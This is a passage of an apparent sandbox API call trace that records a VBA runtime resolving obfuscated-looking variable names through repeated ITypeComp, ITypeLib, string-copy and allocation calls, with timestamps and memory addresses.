szName="_B_var_bUUZcA_") returned 0x1043e7 [0069.100] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_bUUZcA_" | out: _Dst="_B_var_bUUZcA_") returned 0x0 [0069.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_bUUZcA_") returned 15 [0069.100] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.100] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_bUUZcA_", lHashVal=0x1043e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.100] IUnknown:Release (This=0x665ba50) returned 0xd [0069.100] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.100] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_bUUZcA_", lHashVal=0x1043e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.100] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.100] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.100] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_bUUZcA_", lHashVal=0x1043e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.100] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.100] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.100] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_bUUZcA_", lHashVal=0x1043e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.100] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.100] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.100] IUnknown:Release (This=0x665ba50) returned 0xd [0069.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b110fe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_bUUZcA_") returned 15 [0069.101] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_bUUZcA_", lHashVal=0x1043e7, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x63005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x63005a00000000, pDummy=0x0) returned 0x0 [0069.101] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a623d6 | out: _Dst=0x144ec0) returned 0x0 [0069.101] ITypeComp:RemoteBind (in: This=0x665ba60, szName="pQA1QG", lHashVal=0x10763b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62426, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="pQA1QG") returned 7 [0069.101] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="pQA1QG", lHashVal=0x10763b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62426, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="pQA1QG") returned 7 [0069.101] ITypeComp:RemoteBind (in: This=0x665bd30, szName="pQA1QG", lHashVal=0x10763b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.101] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pQA1QG") returned 0x10763b [0069.101] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="pQA1QG" | out: _Dst="pQA1QG") returned 0x0 [0069.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="pQA1QG") returned 7 [0069.101] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.101] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="pQA1QG", lHashVal=0x10763b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.101] IUnknown:Release (This=0x665ba50) returned 0xd [0069.101] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.101] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="pQA1QG", lHashVal=0x10763b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.101] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.101] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.101] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="pQA1QG", lHashVal=0x10763b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.101] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.101] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.101] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="pQA1QG", lHashVal=0x10763b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.102] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62426, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="pQA1QG") returned 7 [0069.102] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="pQA1QG", lHashVal=0x10763b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.102] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.102] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62426 | out: _Dst=0x67c2d40) returned 0x0 [0069.102] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_pQA1QG") returned 0x10f0e4 [0069.102] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_pQA1QG" | out: _Dst="_B_var_pQA1QG") returned 0x0 [0069.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_pQA1QG") returned 14 [0069.102] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.102] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_pQA1QG", lHashVal=0x10f0e4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.102] IUnknown:Release (This=0x665ba50) returned 0xd [0069.102] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.102] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_pQA1QG", lHashVal=0x10f0e4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.102] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.102] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.102] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_pQA1QG", lHashVal=0x10f0e4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.102] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.102] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.102] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_pQA1QG", lHashVal=0x10f0e4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.102] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.102] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.102] IUnknown:Release (This=0x665ba50) returned 0xd [0069.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1112e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_pQA1QG") returned 14 [0069.102] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_pQA1QG", lHashVal=0x10f0e4, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x51003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x51003100000000, pDummy=0x0) returned 0x0 [0069.103] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62426 | out: _Dst=0x144ec0) returned 0x0 [0069.103] ITypeComp:RemoteBind (in: This=0x665ba60, szName="pUUBAcwD", lHashVal=0x10b139, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6244e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="pUUBAcwD") returned 9 [0069.103] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="pUUBAcwD", lHashVal=0x10b139, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6244e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="pUUBAcwD") returned 9 [0069.103] ITypeComp:RemoteBind (in: This=0x665bd30, szName="pUUBAcwD", lHashVal=0x10b139, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.103] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pUUBAcwD") returned 0x10b139 [0069.103] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="pUUBAcwD" | out: _Dst="pUUBAcwD") returned 0x0 [0069.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="pUUBAcwD") returned 9 [0069.103] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.103] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="pUUBAcwD", lHashVal=0x10b139, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.103] IUnknown:Release (This=0x665ba50) returned 0xd [0069.103] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.103] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="pUUBAcwD", lHashVal=0x10b139, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.103] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.103] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.103] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="pUUBAcwD", lHashVal=0x10b139, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.103] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.103] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.103] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="pUUBAcwD", lHashVal=0x10b139, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.103] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6244e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="pUUBAcwD") returned 9 [0069.103] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="pUUBAcwD", lHashVal=0x10b139, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.104] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.104] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6244e | out: _Dst=0x67c2d40) returned 0x0 [0069.104] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_pUUBAcwD") returned 0x1088c2 [0069.104] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_pUUBAcwD" | out: _Dst="_B_var_pUUBAcwD") returned 0x0 [0069.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_pUUBAcwD") returned 16 [0069.104] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.104] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_pUUBAcwD", lHashVal=0x1088c2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.104] IUnknown:Release (This=0x665ba50) returned 0xd [0069.104] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.104] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_pUUBAcwD", lHashVal=0x1088c2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.104] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.104] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.104] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_pUUBAcwD", lHashVal=0x1088c2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.104] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.104] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.104] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_pUUBAcwD", lHashVal=0x1088c2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.104] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.104] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.104] IUnknown:Release (This=0x665ba50) returned 0xd [0069.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1115e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_pUUBAcwD") returned 16 [0069.104] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_pUUBAcwD", lHashVal=0x1088c2, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0) returned 0x0 [0069.104] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6244e | out: _Dst=0x144ec0) returned 0x0 [0069.104] ITypeComp:RemoteBind (in: This=0x665ba60, szName="CU11AADQ", lHashVal=0x10d932, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a624a2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="CU11AADQ") returned 9 [0069.105] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="CU11AADQ", lHashVal=0x10d932, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a624a2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="CU11AADQ") returned 9 [0069.105] ITypeComp:RemoteBind (in: This=0x665bd30, szName="CU11AADQ", lHashVal=0x10d932, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.105] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CU11AADQ") returned 0x10d932 [0069.105] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="CU11AADQ" | out: _Dst="CU11AADQ") returned 0x0 [0069.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="CU11AADQ") returned 9 [0069.105] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.105] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="CU11AADQ", lHashVal=0x10d932, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.105] IUnknown:Release (This=0x665ba50) returned 0xd [0069.105] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.105] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="CU11AADQ", lHashVal=0x10d932, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.105] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.105] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.105] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="CU11AADQ", lHashVal=0x10d932, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.105] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.105] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.105] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="CU11AADQ", lHashVal=0x10d932, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.105] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.105] VirtualAlloc (lpAddress=0x3e61000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e61000 [0069.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a624a2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="CU11AADQ") returned 9 [0069.106] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="CU11AADQ", lHashVal=0x10d932, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.106] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.106] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a624a2 | out: _Dst=0x67c2d40) returned 0x0 [0069.106] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_CU11AADQ") returned 0x10b0bb [0069.106] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_CU11AADQ" | out: _Dst="_B_var_CU11AADQ") returned 0x0 [0069.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_CU11AADQ") returned 16 [0069.106] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.106] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_CU11AADQ", lHashVal=0x10b0bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.107] IUnknown:Release (This=0x665ba50) returned 0xd [0069.107] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.107] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_CU11AADQ", lHashVal=0x10b0bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.107] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.107] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.107] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_CU11AADQ", lHashVal=0x10b0bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.107] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.107] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.107] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_CU11AADQ", lHashVal=0x10b0bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.107] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.107] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.107] IUnknown:Release (This=0x665ba50) returned 0xd [0069.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1118e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_CU11AADQ") returned 16 [0069.107] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_CU11AADQ", lHashVal=0x10b0bb, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x43005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x43005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0) returned 0x0 [0069.107] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a624a2 | out: _Dst=0x144ec0) returned 0x0 [0069.107] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jDAAQxA", lHashVal=0x1056ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6247a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jDAAQxA") returned 8 [0069.107] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jDAAQxA", lHashVal=0x1056ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6247a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jDAAQxA") returned 8 [0069.108] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jDAAQxA", lHashVal=0x1056ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.108] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jDAAQxA") returned 0x1056ad [0069.108] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="jDAAQxA" | out: _Dst="jDAAQxA") returned 0x0 [0069.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="jDAAQxA") returned 8 [0069.108] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.108] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jDAAQxA", lHashVal=0x1056ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.108] IUnknown:Release (This=0x665ba50) returned 0xd [0069.108] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.108] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jDAAQxA", lHashVal=0x1056ad, pfName=0x144bc0, pBstrLibName=0x144af0 | 